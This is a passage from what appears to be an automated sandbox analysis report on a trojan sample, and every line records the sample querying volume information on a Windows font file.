                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
